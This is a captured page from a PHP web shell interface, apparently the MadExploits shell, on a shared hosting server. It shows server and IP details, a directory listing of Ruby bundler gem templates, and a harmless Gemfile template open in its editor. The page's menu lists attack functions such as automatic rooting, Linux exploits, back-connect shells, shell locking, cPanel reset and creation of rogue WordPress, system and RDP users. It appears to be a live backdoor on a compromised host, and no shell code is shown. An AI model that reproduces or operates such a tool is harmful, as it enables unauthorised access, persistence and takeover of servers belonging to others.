Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.22.248.100
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby31 /
share /
gems /
gems /
bundler-2.3.27 /
lib /
bundler /
templates /
newgem /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
circleci
[ DIR ]
drwxr-xr-x
exe
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
github
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
sig
[ DIR ]
drwxr-xr-x
spec
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
CHANGELOG.md.tt
80
B
-rw-r--r--
CODE_OF_CONDUCT.md.tt
5.1
KB
-rw-r--r--
Gemfile.tt
527
B
-rw-r--r--
LICENSE.txt.tt
1.08
KB
-rw-r--r--
README.md.tt
2.41
KB
-rw-r--r--
Rakefile.tt
1.24
KB
-rw-r--r--
gitignore.tt
228
B
-rw-r--r--
gitlab-ci.yml.tt
182
B
-rw-r--r--
newgem.gemspec.tt
1.79
KB
-rw-r--r--
rspec.tt
53
B
-rw-r--r--
rubocop.yml.tt
299
B
-rw-r--r--
standard.yml.tt
184
B
-rw-r--r--
travis.yml.tt
126
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Gemfile.tt
# frozen_string_literal: true source "https://rubygems.org" # Specify your gem's dependencies in <%= config[:name] %>.gemspec gemspec gem "rake", "~> 13.0" <%- if config[:ext] -%> gem "rake-compiler" <%- end -%> <%- if config[:test] -%> gem "<%= config[:test] %>", "~> <%= config[:test_framework_version] %>" <%- end -%> <%- if config[:linter] == "rubocop" -%> gem "rubocop", "~> <%= config[:linter_version] %>" <%- elsif config[:linter] == "standard" -%> gem "standard", "~> <%= config[:linter_version] %>" <%- end -%>
Close